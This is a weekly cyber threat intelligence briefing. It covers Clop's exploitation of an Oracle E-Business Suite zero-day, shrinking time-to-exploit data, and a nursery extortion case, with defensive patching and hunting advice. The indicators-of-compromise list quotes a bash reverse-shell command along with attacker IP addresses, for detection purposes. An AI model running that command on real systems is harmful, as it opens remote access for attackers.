Weekly Cyber Briefing 06.10.2025

Cyber Intelligence Briefing: 06 October 2025

Oracle’s emergency patch for Clop extortion bug; ‘Time to Exploit’ data shows attackers moving faster than ever; Hackers with ethics…sort of

The Cyber Threat Intelligence Briefing is a weekly round-up of the latest cybersecurity news, trends and indicators, curated by our CISO, Nick Harris.


Oracle’s emergency patch for Clop extortion bug

CVE-2025-61882 is a critical remote code execution bug (CVSS 9.8) in the Oracle E-Business Suite’s Concurrent Processing / BI Publisher integration. It can be triggered without authentication over HTTP and is being actively exploited. Oracle issued an emergency patch on 4 October 2025, which requires the October 2023 CPU to be applied.

The vulnerability has been linked to the Clop data-theft/extortion group — a public proof-of-concept and exploit archive leaked online, and Oracle’s indicators of compromise match that leak.

Exploitation has been confirmed in the wild. Mandiant reports that the Clop group exploited multiple Oracle E-Business Suite vulnerabilities — including issues addressed in the July 2025 CPU and this zero-day — to steal large volumes of data in August 2025. No specific victims have been publicly named, though several organisations have reported extortion attempts, and investigations are ongoing.

The indicators of compromise are:

  • IPs: 200.107.207.26, 185.181.60.11
  • Command: sh -c /bin/bash -i >& /dev/tcp/<IP>/<PORT> 0>&1 (reverse shell)
  • Files/hashes: exploit archive and Python scripts listed by Oracle (SHA-256s).
    The full IOC table is in the advisory.

Assured’s CISO reacts:

Advice for Oracle engineers and security practitioners:

1) Patch & prerequisites (change window ASAP)

  1. Verify release & CPU level on every EBS env (PROD, DR, non-prod).
  2. Apply the Oct 2023 Critical Patch Update if it is not already present (Oracle states it’s required). (Oracle)
  3. Apply the Security Alert patch for CVE-2025-61882 for 12.2.3–12.2.14 from My Oracle Support (MOS). (Oracle)
  4. If you deferred July 2025 CPU items affecting EBS, apply those as well, as Clop chained multiple vulnerabilities from July and this zero-day.

2) Exposure reduction (immediately)

  • Ensure EBS app tier isn’t internet-reachable except through your reverse proxy/WAF; block direct HTTP to Concurrent Processing / BI Publisher endpoints. (Attack vector is unauthenticated HTTP) (Oracle)
  • Restrict outbound egress from EBS servers; block unknown TCP reverse shells and alert on atypical outbound connections. (Matches observed reverse-shell behaviour.) (Oracle)
  • WAF/IDS rules: temporarily block requests containing suspicious BIP execution/bursting patterns and inspect unusual HTTP POSTs to EBS. (Exploit uses HTTP GET/POST per Oracle.) (Oracle)

3) Hunt & triage

Search across all EBS hosts and reverse proxies for the last 60–90 days:

  • Network: any hits to/from 200.107.207.26 or 185.181.60.11; unexpected outbound connections from app servers. (Oracle)
  • Process audit: shells or Python invoked by the EBS app user; look for the reverse-shell command pattern Oracle shared. (Oracle)
  • Filesystem: artefacts or filenames related to the leaked exploit archive (hashes in the advisory). (Oracle)
  • App logs: unusual BI Publisher job submissions, concurrent requests executing OS commands, spikes in HTTP 500/200 on relevant endpoints around the timeframe Aug–Oct 2025 (Clop activity window). (BleepingComputer)

4) If you find indicators / suspicious activity…

  • Isolate the app tier, capture volatile data, and rotate all credentials (EBS app, DB, OS, integration accounts, SSO secrets).
  • Review data exfiltration risk: check reverse proxy logs, database audit, and BI Publisher output/bursting destinations for large exports.
  • Engage IR (internal playbook + vendor) and consider notifying Oracle Support with IOC findings for tailored guidance.
  • Legal/comms: Prepare for potential extortion emails spoofing/compromised accounts; Mandiant/Google observed mass extortion mailouts tied to this campaign. (BleepingComputer)

5) Hardening (post-patch)

  • Stop/disable unused BI Publisher integrations on EBS where possible, and ensure least-privilege access for the Concurrent Processing accounts.
  • Segmentation: EBS in its own VLAN with deny-by-default egress; only allow required outbound (SMTP relay, SSO, etc.)
  • Monitoring: permanent alerts for reverse shells, unexpected Python/bash under the EBS user, and large report exports.

‘Time to Exploit’ data shows attackers moving faster than ever

Google’s Threat Intelligence Group analysed 112 vulnerabilities disclosed in 2024 that were confirmed to be exploited in the wild. Historically, most exploits target vulnerabilities after a patch is released, rather than before — a roughly 31:69 split between zero-day (before patch) and n-day (after patch) attacks.

The time to exploit (TTE) measures the time it takes for attackers to begin exploiting a vulnerability once a patch is available. The Google data shows that the window has been shrinking rapidly:

  • 2018–2019: 63 days
  • 2020–2021: 44 days
  • 2021–2022: 32 days
  • 2023: 5 days
  • 2024: –1 day (meaning exploits are now appearing before patches are released)

Assured’s CISO reacts:

The trend revealed by this Google data indicates that attackers are moving faster than ever, often striking before defenders have a chance to patch. It highlights the importance of strong incident response planning and cyber insurance to help organisations recover from attacks that can’t be prevented through patching alone.

While we can’t control the uncontrollables, we can control timely patching. Automate patch deployment (with patch rings, canary devices, etc.) so that patches are rolled out as soon as they are available. It’s also important to plan for the possibility of no patch. Good incident response plans should make provisions for exploits that cannot be patched.


Hackers with ethics…sort of

Hackers, known as Radiant, who tried to extort nursery chain Kido Schools by posting stolen images and data of children online, have removed the posts and claimed to have deleted the information. The group had published child profiles and threatened to release more until a Bitcoin ransom was paid, even contacting parents directly. Following widespread outrage, the attackers blurred the images, then took all data offline and issued an apology.

It’s believed that Kido did not pay the ransom, which was thought to be over half a million pounds.

Assured’s CISO reacts:

This incident reminds us of the LockBit ransomware attack on a children’s hospital in Toronto, Canada (SickKids Hospital), in December 2022.  In that incident, the LockBit operators issued a public apology on their leak site, claiming that one of their affiliates had violated group policy by targeting a healthcare organisation. They offered a free decryptor key to the hospital and said the responsible affiliate had been “blocked.”

These examples serve as a reminder of the importance of PR to go on the offensive and turn public opinion against the threat groups. External communication strategy should therefore be considered as part of crisis planning.

Latest articles

Be an insider. Sign up now!